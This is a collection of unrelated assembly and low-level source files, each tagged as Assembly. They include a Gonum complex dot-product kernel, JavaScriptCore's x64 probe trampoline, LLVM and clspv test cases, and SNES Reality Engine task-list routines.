ld bc, 7a00
ld hl, 8000
ld d, a0
lprint_copytiles:
ld a, (bc)
inc bc
ld(hl++), a
dec d
jrnz lprint_copytiles
ld a, c0
ldff(47), a
ld a, 80
ldff(68), a
ld a, ff
ldff(69), a
ldff(69), a
ldff(69), a
ldff(69), a
ldff(69), a
ldff(69), a
xor a, a
ldff(69), a
ldff(69), a
ldff(43), a
ld a, 91
ldff(40), a
lprint_limbo:
jr lprint_limbo
.text@7400
; Busy-wait until the LCD line counter equals the value in B.
; In: B = target LY value.  Clobbers: A, C.
lwaitly_b:
ld c, 44                ; C = low byte of LY register (FF44)
lwaitly_b_loop:
ldff a, (c)             ; A = current LY
cmp a, b                ; reached the requested line yet?
jrnz lwaitly_b_loop     ; no — keep polling
ret
.data@7a00
00 00 7f 7f 41 41 41 41
41 41 41 41 41 41 7f 7f
00 00 08 08 08 08 08 08
08 08 08 08 08 08 08 08
00 00 7f 7f 01 01 01 01
7f 7f 40 40 40 40 7f 7f
00 00 7f 7f 01 01 01 01
3f 3f 01 01 01 01 7f 7f
00 00 41 41 41 41 41 41
7f 7f 01 01 01 01 01 01
00 00 7f 7f 40 40 40 40
7e 7e 01 01 01 01 7e 7e
00 00 7f 7f 40 40 40 40
7f 7f 41 41 41 41 7f 7f
00 00 7f 7f 01 01 02 02
04 04 08 08 10 10 10 10
00 00 3e 3e 41 41 41 41
3e 3e 41 41 41 41 3e 3e
00 00 7f 7f 41 41 41 41
7f 7f 01 01 01 01 7f 7f
| {
"language": "Assembly"
} |
// Copyright 2012 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// This code was translated into a form compatible with 6a from the public
// domain sources in SUPERCOP: https://bench.cr.yp.to/supercop.html
// +build amd64,!gccgo,!appengine
// These constants cannot be encoded in non-MOVQ immediates.
// We access them directly from memory instead.
DATA ·_121666_213(SB)/8, $996687872
GLOBL ·_121666_213(SB), 8, $8
DATA ·_2P0(SB)/8, $0xFFFFFFFFFFFDA
GLOBL ·_2P0(SB), 8, $8
DATA ·_2P1234(SB)/8, $0xFFFFFFFFFFFFE
GLOBL ·_2P1234(SB), 8, $8
| {
"language": "Assembly"
} |
// Copyright ©2016 The Gonum Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build !noasm,!appengine,!safe
#include "textflag.h"
#define MOVDDUP_XPTR_IDX_8__X3 LONG $0x1C120FF2; BYTE $0xC6 // MOVDDUP (SI)(AX*8), X3
#define MOVDDUP_16_XPTR_IDX_8__X5 LONG $0x6C120FF2; WORD $0x10C6 // MOVDDUP 16(SI)(AX*8), X5
#define MOVDDUP_32_XPTR_IDX_8__X7 LONG $0x7C120FF2; WORD $0x20C6 // MOVDDUP 32(SI)(AX*8), X7
#define MOVDDUP_48_XPTR_IDX_8__X9 LONG $0x120F44F2; WORD $0xC64C; BYTE $0x30 // MOVDDUP 48(SI)(AX*8), X9
#define MOVDDUP_XPTR_IIDX_8__X2 LONG $0x14120FF2; BYTE $0xD6 // MOVDDUP (SI)(DX*8), X2
#define MOVDDUP_16_XPTR_IIDX_8__X4 LONG $0x64120FF2; WORD $0x10D6 // MOVDDUP 16(SI)(DX*8), X4
#define MOVDDUP_32_XPTR_IIDX_8__X6 LONG $0x74120FF2; WORD $0x20D6 // MOVDDUP 32(SI)(DX*8), X6
#define MOVDDUP_48_XPTR_IIDX_8__X8 LONG $0x120F44F2; WORD $0xD644; BYTE $0x30 // MOVDDUP 48(SI)(DX*8), X8
#define ADDSUBPD_X2_X3 LONG $0xDAD00F66 // ADDSUBPD X2, X3
#define ADDSUBPD_X4_X5 LONG $0xECD00F66 // ADDSUBPD X4, X5
#define ADDSUBPD_X6_X7 LONG $0xFED00F66 // ADDSUBPD X6, X7
#define ADDSUBPD_X8_X9 LONG $0xD00F4566; BYTE $0xC8 // ADDSUBPD X8, X9
#define X_PTR SI
#define Y_PTR DI
#define LEN CX
#define TAIL BX
#define SUM X0
#define P_SUM X1
#define IDX AX
#define I_IDX DX
#define NEG1 X15
#define P_NEG1 X14
// func DotcUnitary(x, y []complex128) (sum complex128)
TEXT ·DotcUnitary(SB), NOSPLIT, $0
MOVQ x_base+0(FP), X_PTR // X_PTR = &x
MOVQ y_base+24(FP), Y_PTR // Y_PTR = &y
MOVQ x_len+8(FP), LEN // LEN = min( len(x), len(y) )
CMPQ y_len+32(FP), LEN
CMOVQLE y_len+32(FP), LEN
PXOR SUM, SUM // sum = 0
CMPQ LEN, $0 // if LEN == 0 { return }
JE dot_end
XORPS P_SUM, P_SUM // psum = 0 (second accumulator for pipelining)
MOVSD $(-1.0), NEG1
SHUFPD $0, NEG1, NEG1 // NEG1 = { -1, -1 } (used to conjugate x[i])
XORQ IDX, IDX // i := 0 (even float64 index: real parts)
MOVQ $1, I_IDX // j := 1 (odd float64 index: imaginary parts)
MOVQ LEN, TAIL
ANDQ $3, TAIL // TAIL = LEN % 4 (complex128 elements left over)
SHRQ $2, LEN // LEN = floor( LEN / 4 ) (unrolled iterations)
JZ dot_tail // if LEN == 0 { goto dot_tail }
MOVAPS NEG1, P_NEG1 // Copy NEG1 to P_NEG1 for pipelining
dot_loop: // do {  (4 complex128 elements per iteration)
MOVDDUP_XPTR_IDX_8__X3 // X_(i+1) = { real(x[i]), real(x[i]) }
MOVDDUP_16_XPTR_IDX_8__X5
MOVDDUP_32_XPTR_IDX_8__X7
MOVDDUP_48_XPTR_IDX_8__X9
MOVDDUP_XPTR_IIDX_8__X2 // X_i = { imag(x[i]), imag(x[i]) }
MOVDDUP_16_XPTR_IIDX_8__X4
MOVDDUP_32_XPTR_IIDX_8__X6
MOVDDUP_48_XPTR_IIDX_8__X8
// X_i = { -imag(x[i]), -imag(x[i]) }  (conjugate of x[i]: Dotc uses conj(x))
MULPD NEG1, X2
MULPD P_NEG1, X4
MULPD NEG1, X6
MULPD P_NEG1, X8
// X_j = { imag(y[i]), real(y[i]) }
MOVUPS (Y_PTR)(IDX*8), X10
MOVUPS 16(Y_PTR)(IDX*8), X11
MOVUPS 32(Y_PTR)(IDX*8), X12
MOVUPS 48(Y_PTR)(IDX*8), X13
// X_(i+1) = { imag(a) * real(x[i]), real(a) * real(x[i]) }
MULPD X10, X3
MULPD X11, X5
MULPD X12, X7
MULPD X13, X9
// X_j = { real(y[i]), imag(y[i]) }
SHUFPD $0x1, X10, X10
SHUFPD $0x1, X11, X11
SHUFPD $0x1, X12, X12
SHUFPD $0x1, X13, X13
// X_i = { real(a) * imag(x[i]), imag(a) * imag(x[i]) }
MULPD X10, X2
MULPD X11, X4
MULPD X12, X6
MULPD X13, X8
// X_(i+1) = {
// imag(result[i]): imag(a)*real(x[i]) + real(a)*imag(x[i]),
// real(result[i]): real(a)*real(x[i]) - imag(a)*imag(x[i])
// }
ADDSUBPD_X2_X3
ADDSUBPD_X4_X5
ADDSUBPD_X6_X7
ADDSUBPD_X8_X9
// sum/psum += result[i] (two accumulators to break the dependency chain)
ADDPD X3, SUM
ADDPD X5, P_SUM
ADDPD X7, SUM
ADDPD X9, P_SUM
ADDQ $8, IDX // IDX += 8 (4 complex128 = 8 float64)
ADDQ $8, I_IDX // I_IDX += 8
DECQ LEN
JNZ dot_loop // } while --LEN > 0
ADDPD P_SUM, SUM // sum += psum (fold the second accumulator)
CMPQ TAIL, $0 // if TAIL == 0 { return }
JE dot_end
dot_tail: // do {  (one complex128 element per iteration)
MOVDDUP_XPTR_IDX_8__X3 // X_(i+1) = { real(x[i]) , real(x[i]) }
MOVDDUP_XPTR_IIDX_8__X2 // X_i = { imag(x[i]) , imag(x[i]) }
MULPD NEG1, X2 // X_i = { -imag(x[i]) , -imag(x[i]) }
MOVUPS (Y_PTR)(IDX*8), X10 // X_j = { imag(y[i]) , real(y[i]) }
MULPD X10, X3 // X_(i+1) = { imag(a) * real(x[i]), real(a) * real(x[i]) }
SHUFPD $0x1, X10, X10 // X_j = { real(y[i]) , imag(y[i]) }
MULPD X10, X2 // X_i = { real(a) * imag(x[i]), imag(a) * imag(x[i]) }
// X_(i+1) = {
// imag(result[i]): imag(a)*real(x[i]) + real(a)*imag(x[i]),
// real(result[i]): real(a)*real(x[i]) - imag(a)*imag(x[i])
// }
ADDSUBPD_X2_X3
ADDPD X3, SUM // SUM += result[i]
ADDQ $2, IDX // IDX += 2 (1 complex128 = 2 float64)
ADDQ $2, I_IDX // I_IDX += 2
DECQ TAIL
JNZ dot_tail // } while --TAIL > 0
dot_end:
MOVUPS SUM, sum+48(FP)
RET
| {
"language": "Assembly"
} |
;/*
; Copyright (C) 2014 Apple Inc. All rights reserved.
;
; Redistribution and use in source and binary forms, with or without
; modification, are permitted provided that the following conditions
; are met:
; 1. Redistributions of source code must retain the above copyright
; notice, this list of conditions and the following disclaimer.
; 2. Redistributions in binary form must reproduce the above copyright
; notice, this list of conditions and the following disclaimer in the
; documentation and/or other materials provided with the distribution.
;
; THIS SOFTWARE IS PROVIDED BY APPLE INC. ``AS IS'' AND ANY
; EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
; IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
; PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR
; CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
; EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
; PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
; PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
; OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
; (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
; OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
;*/
EXTERN getHostCallReturnValueWithExecState : near
PUBLIC getHostCallReturnValue
PUBLIC ctiMasmProbeTrampoline
_TEXT SEGMENT
getHostCallReturnValue PROC
; NOTE(review): rsp - 8 is the stack slot just below the caller's return
; address; presumably this is how the ExecState* is recovered — confirm
; against the JIT's call-site layout.
lea rcx, [rsp - 8]
; rcx is the first argument register in the Microsoft x64 calling convention.
; Allocate the 32-byte shadow space for the 4 parameter registers, and align
; the stack pointer to a 16-byte boundary by allocating another 8 bytes.
; The stack alignment is needed to fix a crash in the CRT library on a floating point instruction.
sub rsp, 40
call getHostCallReturnValueWithExecState
add rsp, 40
ret
getHostCallReturnValue ENDP
; The following constants must match the x86_64 version in MacroAssemblerX86Common.cpp.
PTR_SIZE EQU 8
PROBE_PROBE_FUNCTION_OFFSET EQU (0 * PTR_SIZE)
PROBE_ARG_OFFSET EQU (1 * PTR_SIZE)
PROBE_INIT_STACK_FUNCTION_OFFSET EQU (2 * PTR_SIZE)
PROBE_INIT_STACK_ARG_OFFSET EQU (3 * PTR_SIZE)
PROBE_FIRST_GPR_OFFSET EQU (4 * PTR_SIZE)
PROBE_CPU_EAX_OFFSET EQU (PROBE_FIRST_GPR_OFFSET + (0 * PTR_SIZE))
PROBE_CPU_ECX_OFFSET EQU (PROBE_FIRST_GPR_OFFSET + (1 * PTR_SIZE))
PROBE_CPU_EDX_OFFSET EQU (PROBE_FIRST_GPR_OFFSET + (2 * PTR_SIZE))
PROBE_CPU_EBX_OFFSET EQU (PROBE_FIRST_GPR_OFFSET + (3 * PTR_SIZE))
PROBE_CPU_ESP_OFFSET EQU (PROBE_FIRST_GPR_OFFSET + (4 * PTR_SIZE))
PROBE_CPU_EBP_OFFSET EQU (PROBE_FIRST_GPR_OFFSET + (5 * PTR_SIZE))
PROBE_CPU_ESI_OFFSET EQU (PROBE_FIRST_GPR_OFFSET + (6 * PTR_SIZE))
PROBE_CPU_EDI_OFFSET EQU (PROBE_FIRST_GPR_OFFSET + (7 * PTR_SIZE))
PROBE_CPU_R8_OFFSET EQU (PROBE_FIRST_GPR_OFFSET + (8 * PTR_SIZE))
PROBE_CPU_R9_OFFSET EQU (PROBE_FIRST_GPR_OFFSET + (9 * PTR_SIZE))
PROBE_CPU_R10_OFFSET EQU (PROBE_FIRST_GPR_OFFSET + (10 * PTR_SIZE))
PROBE_CPU_R11_OFFSET EQU (PROBE_FIRST_GPR_OFFSET + (11 * PTR_SIZE))
PROBE_CPU_R12_OFFSET EQU (PROBE_FIRST_GPR_OFFSET + (12 * PTR_SIZE))
PROBE_CPU_R13_OFFSET EQU (PROBE_FIRST_GPR_OFFSET + (13 * PTR_SIZE))
PROBE_CPU_R14_OFFSET EQU (PROBE_FIRST_GPR_OFFSET + (14 * PTR_SIZE))
PROBE_CPU_R15_OFFSET EQU (PROBE_FIRST_GPR_OFFSET + (15 * PTR_SIZE))
PROBE_FIRST_SPR_OFFSET EQU (PROBE_FIRST_GPR_OFFSET + (16 * PTR_SIZE))
PROBE_CPU_EIP_OFFSET EQU (PROBE_FIRST_SPR_OFFSET + (0 * PTR_SIZE))
PROBE_CPU_EFLAGS_OFFSET EQU (PROBE_FIRST_SPR_OFFSET + (1 * PTR_SIZE))
PROBE_FIRST_XMM_OFFSET EQU (PROBE_FIRST_SPR_OFFSET + (2 * PTR_SIZE))
XMM_SIZE EQU 8
PROBE_CPU_XMM0_OFFSET EQU (PROBE_FIRST_XMM_OFFSET + (0 * XMM_SIZE))
PROBE_CPU_XMM1_OFFSET EQU (PROBE_FIRST_XMM_OFFSET + (1 * XMM_SIZE))
PROBE_CPU_XMM2_OFFSET EQU (PROBE_FIRST_XMM_OFFSET + (2 * XMM_SIZE))
PROBE_CPU_XMM3_OFFSET EQU (PROBE_FIRST_XMM_OFFSET + (3 * XMM_SIZE))
PROBE_CPU_XMM4_OFFSET EQU (PROBE_FIRST_XMM_OFFSET + (4 * XMM_SIZE))
PROBE_CPU_XMM5_OFFSET EQU (PROBE_FIRST_XMM_OFFSET + (5 * XMM_SIZE))
PROBE_CPU_XMM6_OFFSET EQU (PROBE_FIRST_XMM_OFFSET + (6 * XMM_SIZE))
PROBE_CPU_XMM7_OFFSET EQU (PROBE_FIRST_XMM_OFFSET + (7 * XMM_SIZE))
PROBE_CPU_XMM8_OFFSET EQU (PROBE_FIRST_XMM_OFFSET + (8 * XMM_SIZE))
PROBE_CPU_XMM9_OFFSET EQU (PROBE_FIRST_XMM_OFFSET + (9 * XMM_SIZE))
PROBE_CPU_XMM10_OFFSET EQU (PROBE_FIRST_XMM_OFFSET + (10 * XMM_SIZE))
PROBE_CPU_XMM11_OFFSET EQU (PROBE_FIRST_XMM_OFFSET + (11 * XMM_SIZE))
PROBE_CPU_XMM12_OFFSET EQU (PROBE_FIRST_XMM_OFFSET + (12 * XMM_SIZE))
PROBE_CPU_XMM13_OFFSET EQU (PROBE_FIRST_XMM_OFFSET + (13 * XMM_SIZE))
PROBE_CPU_XMM14_OFFSET EQU (PROBE_FIRST_XMM_OFFSET + (14 * XMM_SIZE))
PROBE_CPU_XMM15_OFFSET EQU (PROBE_FIRST_XMM_OFFSET + (15 * XMM_SIZE))
PROBE_SIZE EQU (PROBE_CPU_XMM15_OFFSET + XMM_SIZE)
PROBE_EXECUTOR_OFFSET EQU PROBE_SIZE ; Stash the executeProbe function pointer at the end of the ProbeContext.
OUT_SIZE EQU (5 * PTR_SIZE)
ctiMasmProbeTrampoline PROC
pushfq
; MacroAssemblerX86Common::probe() has already generated code to store some values.
; Together with the rflags pushed above, the top of stack now looks like this:
; rsp[0 * ptrSize]: rflags
; rsp[1 * ptrSize]: return address / saved rip
; rsp[2 * ptrSize]: saved rbx
; rsp[3 * ptrSize]: saved rdx
; rsp[4 * ptrSize]: saved rcx
; rsp[5 * ptrSize]: saved rax
;
; Incoming registers contain:
; rcx: Probe::executeProbe
; rdx: probe function
; rbx: probe arg
; rax: scratch (was ctiMasmProbeTrampoline)
mov rax, rsp
sub rsp, PROBE_SIZE + OUT_SIZE
    ; The X86_64 ABI specifies that the worst case stack alignment requirement is 32 bytes.
and rsp, not 01fh
; Since sp points to the ProbeContext, we've ensured that it's protected from interrupts before we initialize it.
mov [PROBE_CPU_EBP_OFFSET + rsp], rbp
mov rbp, rsp ; Save the ProbeContext*.
mov [PROBE_EXECUTOR_OFFSET + rbp], rcx
mov [PROBE_PROBE_FUNCTION_OFFSET + rbp], rdx
mov [PROBE_ARG_OFFSET + rbp], rbx
mov [PROBE_CPU_ESI_OFFSET + rbp], rsi
mov [PROBE_CPU_EDI_OFFSET + rbp], rdi
mov rcx, [0 * PTR_SIZE + rax]
mov [PROBE_CPU_EFLAGS_OFFSET + rbp], rcx
mov rcx, [1 * PTR_SIZE + rax]
mov [PROBE_CPU_EIP_OFFSET + rbp], rcx
mov rcx, [2 * PTR_SIZE + rax]
mov [PROBE_CPU_EBX_OFFSET + rbp], rcx
mov rcx, [3 * PTR_SIZE + rax]
mov [PROBE_CPU_EDX_OFFSET + rbp], rcx
mov rcx, [4 * PTR_SIZE + rax]
mov [PROBE_CPU_ECX_OFFSET + rbp], rcx
mov rcx, [5 * PTR_SIZE + rax]
mov [PROBE_CPU_EAX_OFFSET + rbp], rcx
mov rcx, rax
add rcx, 6 * PTR_SIZE
mov [PROBE_CPU_ESP_OFFSET + rbp], rcx
mov [PROBE_CPU_R8_OFFSET + rbp], r8
mov [PROBE_CPU_R9_OFFSET + rbp], r9
mov [PROBE_CPU_R10_OFFSET + rbp], r10
mov [PROBE_CPU_R11_OFFSET + rbp], r11
mov [PROBE_CPU_R12_OFFSET + rbp], r12
mov [PROBE_CPU_R13_OFFSET + rbp], r13
mov [PROBE_CPU_R14_OFFSET + rbp], r14
mov [PROBE_CPU_R15_OFFSET + rbp], r15
movq qword ptr [PROBE_CPU_XMM0_OFFSET + rbp], xmm0
movq qword ptr [PROBE_CPU_XMM1_OFFSET + rbp], xmm1
movq qword ptr [PROBE_CPU_XMM2_OFFSET + rbp], xmm2
movq qword ptr [PROBE_CPU_XMM3_OFFSET + rbp], xmm3
movq qword ptr [PROBE_CPU_XMM4_OFFSET + rbp], xmm4
movq qword ptr [PROBE_CPU_XMM5_OFFSET + rbp], xmm5
movq qword ptr [PROBE_CPU_XMM6_OFFSET + rbp], xmm6
movq qword ptr [PROBE_CPU_XMM7_OFFSET + rbp], xmm7
movq qword ptr [PROBE_CPU_XMM8_OFFSET + rbp], xmm8
movq qword ptr [PROBE_CPU_XMM9_OFFSET + rbp], xmm9
movq qword ptr [PROBE_CPU_XMM10_OFFSET + rbp], xmm10
movq qword ptr [PROBE_CPU_XMM11_OFFSET + rbp], xmm11
movq qword ptr [PROBE_CPU_XMM12_OFFSET + rbp], xmm12
movq qword ptr [PROBE_CPU_XMM13_OFFSET + rbp], xmm13
movq qword ptr [PROBE_CPU_XMM14_OFFSET + rbp], xmm14
movq qword ptr [PROBE_CPU_XMM15_OFFSET + rbp], xmm15
mov rcx, rbp ; the Probe::State* arg.
sub rsp, 32 ; shadow space
call qword ptr[PROBE_EXECUTOR_OFFSET + rbp]
add rsp, 32
; Make sure the ProbeContext is entirely below the result stack pointer so
; that register values are still preserved when we call the initializeStack
; function.
mov rcx, PROBE_SIZE + OUT_SIZE
mov rax, rbp
mov rdx, [PROBE_CPU_ESP_OFFSET + rbp]
add rax, rcx
cmp rdx, rax
jge ctiMasmProbeTrampolineProbeContextIsSafe
; Allocate a safe place on the stack below the result stack pointer to stash the ProbeContext.
sub rdx, rcx
and rdx, not 01fh ; Keep the stack pointer 32 bytes aligned.
xor rax, rax
mov rsp, rdx
mov rcx, PROBE_SIZE
; Copy the ProbeContext to the safe place.
ctiMasmProbeTrampolineCopyLoop:
mov rdx, [rbp + rax]
mov [rsp + rax], rdx
add rax, PTR_SIZE
cmp rcx, rax
jg ctiMasmProbeTrampolineCopyLoop
mov rbp, rsp
; Call initializeStackFunction if present.
ctiMasmProbeTrampolineProbeContextIsSafe:
xor rcx, rcx
add rcx, [PROBE_INIT_STACK_FUNCTION_OFFSET + rbp]
je ctiMasmProbeTrampolineRestoreRegisters
mov rdx, rcx
mov rcx, rbp ; the Probe::State* arg.
sub rsp, 32 ; shadow space
call rdx
add rsp, 32
ctiMasmProbeTrampolineRestoreRegisters:
; To enable probes to modify register state, we copy all registers
; out of the ProbeContext before returning.
mov rdx, [PROBE_CPU_EDX_OFFSET + rbp]
mov rbx, [PROBE_CPU_EBX_OFFSET + rbp]
mov rsi, [PROBE_CPU_ESI_OFFSET + rbp]
mov rdi, [PROBE_CPU_EDI_OFFSET + rbp]
mov r8, [PROBE_CPU_R8_OFFSET + rbp]
mov r9, [PROBE_CPU_R9_OFFSET + rbp]
mov r10, [PROBE_CPU_R10_OFFSET + rbp]
mov r11, [PROBE_CPU_R11_OFFSET + rbp]
mov r12, [PROBE_CPU_R12_OFFSET + rbp]
mov r13, [PROBE_CPU_R13_OFFSET + rbp]
mov r14, [PROBE_CPU_R14_OFFSET + rbp]
mov r15, [PROBE_CPU_R15_OFFSET + rbp]
movq xmm0, qword ptr[PROBE_CPU_XMM0_OFFSET + rbp]
movq xmm1, qword ptr[PROBE_CPU_XMM1_OFFSET + rbp]
movq xmm2, qword ptr[PROBE_CPU_XMM2_OFFSET + rbp]
movq xmm3, qword ptr[PROBE_CPU_XMM3_OFFSET + rbp]
movq xmm4, qword ptr[PROBE_CPU_XMM4_OFFSET + rbp]
movq xmm5, qword ptr[PROBE_CPU_XMM5_OFFSET + rbp]
movq xmm6, qword ptr[PROBE_CPU_XMM6_OFFSET + rbp]
movq xmm7, qword ptr[PROBE_CPU_XMM7_OFFSET + rbp]
movq xmm8, qword ptr[PROBE_CPU_XMM8_OFFSET + rbp]
movq xmm9, qword ptr[PROBE_CPU_XMM9_OFFSET + rbp]
movq xmm10, qword ptr[PROBE_CPU_XMM10_OFFSET + rbp]
movq xmm11, qword ptr[PROBE_CPU_XMM11_OFFSET + rbp]
movq xmm12, qword ptr[PROBE_CPU_XMM12_OFFSET + rbp]
movq xmm13, qword ptr[PROBE_CPU_XMM13_OFFSET + rbp]
movq xmm14, qword ptr[PROBE_CPU_XMM14_OFFSET + rbp]
movq xmm15, qword ptr[PROBE_CPU_XMM15_OFFSET + rbp]
; There are 6 more registers left to restore:
; rax, rcx, rbp, rsp, rip, and rflags.
; The restoration process at ctiMasmProbeTrampolineEnd below works by popping
; 5 words off the stack into rflags, rax, rcx, rbp, and rip. These 5 words need
; to be pushed on top of the final esp value so that just by popping the 5 words,
; we'll get the esp that the probe wants to set. Let's call this area (for storing
; these 5 words) the restore area.
mov rcx, [PROBE_CPU_ESP_OFFSET + rbp]
sub rcx, 5 * PTR_SIZE
; rcx now points to the restore area.
; Copy remaining restore values from the ProbeContext to the restore area.
; Note: We already ensured above that the ProbeContext is in a safe location before
; calling the initializeStackFunction. The initializeStackFunction is not allowed to
; change the stack pointer again.
mov rax, [PROBE_CPU_EFLAGS_OFFSET + rbp]
mov [0 * PTR_SIZE + rcx], rax
mov rax, [PROBE_CPU_EAX_OFFSET + rbp]
mov [1 * PTR_SIZE + rcx], rax
mov rax, [PROBE_CPU_ECX_OFFSET + rbp]
mov [2 * PTR_SIZE + rcx], rax
mov rax, [PROBE_CPU_EBP_OFFSET + rbp]
mov [3 * PTR_SIZE + rcx], rax
mov rax, [PROBE_CPU_EIP_OFFSET + rbp]
mov [4 * PTR_SIZE + rcx], rax
mov rsp, rcx
; Do the remaining restoration by popping off the restore area.
popfq
pop rax
pop rcx
pop rbp
ret
ctiMasmProbeTrampoline ENDP
_TEXT ENDS
END
| {
"language": "Assembly"
} |
/* radare - LGPL - Copyright 2009-2020 - nibble, pancake */
#define R_BIN_ELF64 1
#include "bin_dbginfo_elf.c"
| {
"language": "Assembly"
} |
; RUN: clspv-opt -SplatArg %s -o %t.ll
; RUN: FileCheck %s < %t.ll
; CHECK: [[x_in0:%[a-zA-Z0-9_.]+]] = insertelement <3 x half> undef, half %x, i32 0
; CHECK: [[x_shuffle:%[a-zA-Z0-9_.]+]] = shufflevector <3 x half> [[x_in0]], <3 x half> undef, <3 x i32> zeroinitializer
; CHECK: [[call:%[a-zA-Z0-9_.]+]] = call spir_func <3 x half> @_Z3maxDv3_DhS_(<3 x half> %in, <3 x half> [[x_shuffle]])
; CHECK: ret <3 x half> [[call]]
target datalayout = "e-p:32:32-i64:64-v16:16-v24:32-v32:32-v48:64-v96:128-v192:256-v256:256-v512:512-v1024:1024"
target triple = "spir-unknown-unknown"
define <3 x half> @foo(half %x, <3 x half> %in) {
entry:
%call = call <3 x half> @_Z3maxDv3_DhDh(<3 x half> %in, half %x)
ret <3 x half> %call
}
declare <3 x half> @_Z3maxDv3_DhDh(<3 x half>, half)
| {
"language": "Assembly"
} |
-- DISTRIBUTE_RESULT |PARTITIONED|
-- ONE_TO_ONE_EXCHANGE |PARTITIONED|
-- STREAM_PROJECT |PARTITIONED|
-- STREAM_SELECT |PARTITIONED|
-- STREAM_PROJECT |PARTITIONED|
-- ASSIGN |PARTITIONED|
-- ASSIGN |PARTITIONED|
-- STREAM_PROJECT |PARTITIONED|
-- ONE_TO_ONE_EXCHANGE |PARTITIONED|
-- BTREE_SEARCH |PARTITIONED|
-- ONE_TO_ONE_EXCHANGE |PARTITIONED|
-- STABLE_SORT [$$27(ASC)] |PARTITIONED|
-- ONE_TO_ONE_EXCHANGE |PARTITIONED|
-- STREAM_PROJECT |PARTITIONED|
-- ONE_TO_ONE_EXCHANGE |PARTITIONED|
-- BTREE_SEARCH |PARTITIONED|
-- ONE_TO_ONE_EXCHANGE |PARTITIONED|
-- ASSIGN |PARTITIONED|
-- EMPTY_TUPLE_SOURCE |PARTITIONED| | {
"language": "Assembly"
} |
; RUN: llc < %s -mtriple=thumbv7-apple-darwin -mattr=+thumb2 | FileCheck %s
@b = external global i64*
define i64 @t(i64 %a) nounwind readonly {
entry:
; CHECK: ldrd
; CHECK: umull
%0 = load i64** @b, align 4
%1 = load i64* %0, align 4
%2 = mul i64 %1, %a
ret i64 %2
}
| {
"language": "Assembly"
} |
;**********************************************************************
;* *
;* P R O J E C T : REALITY_ENGINE *
;* *
;* TASKS HANDLING MODULE *
;* *
;**********************************************************************
include rage.i
include rle.i
include gsumac.i
SECTION LEVEL
;
; * * * * * * * INITIALIZE TASKS * * * * * * *
;
dbr ?
dpr 0
; Initialize the task system: clear the running-task counter and mark
; every slot in _RLTasks as free.  A slot whose code field is -1 is free
; (the add routine tests this by incrementing the loaded value to 0).
_RLInitTasks
mode 'AX!'
lda #0 ; NO TASKS RUNNING!
sta RLNumTasks
tax ; X = 0 = byte offset of first task slot
ldy #MaxRLTasks-1 ; Y = slot loop counter
_RITS200
lda #-1 ; -1 marks the slot's code field as free
sta >_RLTasks,x
txa ; advance X to the next slot
clc
adc #rlmSize
tax
dey
bpl _RITS200 ; loop over all MaxRLTasks slots
rtl
SECTION ENGINE_RAMCODE
;
; * * * * * * * ADD A TASK * * * * * * *
;
; ADD NEW TASK TO TASKLIST
;
; .Y = TaskCode
; .X = TaskData
;
dbr ?
dpr 0
mode 'AX'
; Long-call wrapper around _RLAddTaskSNES for far callers.
__RLAddTaskSNES
jsr _RLAddTaskSNES
rtl
; Add a new task to the task list.
; In:  Y = TaskCode address, X = TaskData address.
; Scans _RLTasks for the first free slot (code field == -1) and stores
; the code/data pointers there, then bumps RLNumTasks.
; NOTE(review): no bounds check against MaxRLTasks here — if the table is
; full the scan runs past the end; confirm callers guarantee a free slot
; (the GSU-side _RLAddTask does check under DEBUG).
_RLAddTaskSNES
phx ; Save TaskData
phy ; Save TaskCode
ldx #0 ; Offset to TaskData
_RLATS200
lda >_RLTasks,x ; Get TaskCode Address
inc a ; Any CODE Here? (-1 + 1 == 0 means slot is free)
beq _RLATS500 ; No! ReUse this Slot!
txa ; advance to the next slot
clc
adc #rlmSize
tax
jmp _RLATS200
_RLATS500
lda RLNumTasks ; Increment Number of Tasks Running
inc a
sta RLNumTasks
pla ; Save Address of TaskCode
sta >_RLTasks+rlmCode,x
pla ; Save Address of TaskData
sta >_RLTasks+rlmData,x
rts
SECTION ENGINE_GSUCODE
cpu sfx
rTaskPtr equ r10 ; Pointer to RLTask Structure
rTaskCount equ r13 ; TaskCounter
;
; * * * * * * * ADD A TASK * * * * * * *
;
; ADD NEW TASK TO TASKLIST
;
; R9 = TaskCode Address-1
; R8 = TaskData Address
; R11 = Return Address
;
; rTaskPointer = Pointer to TaskStructure.TaskData
;
_RLAddTask
move r0,(<RLNumTasks) ; Get Number of Tasks Running
inc r0
;
ifn DEBUG
move r1,#MaxRLTasks ; Too many tasks?
; from r0
cmp r1
bne .0 ; No, Add this one
HALTGSU #$80
.0
endif
; from r0
sbk
move rTaskPtr,#<_RLTasks ; Pointer to TaskData
_RLAT200
; to r0 ; Get TaskCode Address
ldw (rTaskPtr)
inc r0 ; Any CODE Here?
beq _RLAT500 ; No! ReUse this Slot!
with rTaskPtr
add #rlmSize
bra _RLAT200
nop
_RLAT500
move r0,r8 ; Save Address of TaskData
from r9 ; Save Address of TaskCode
stw (rTaskPtr)
inc rTaskPtr
inc rTaskPtr
jmp r11 ; Return to Caller
; from r0
stw (rTaskPtr)
;
; * * * * * * * REMOVE A TASK * * * * * * *
;
; REMOVE EXISTING TASK FROM TASKLIST
;
; R10 = Pointer to TaskStructure
; R11 = Return Address
;
_RLRemTask
move r0,(<RLNumTasks) ; Get Number of Tasks Running
dec r0
; from r0
sbk
move r0,#-1 ; Disable this Task
jmp r11 ; Return to Caller
; from r0
stw (rTaskPtr)
;
; * * * * * * * DO TASKS * * * * * * *
;
; EXECUTE TASKS IN TASKLIST
;
_RLDoTasks
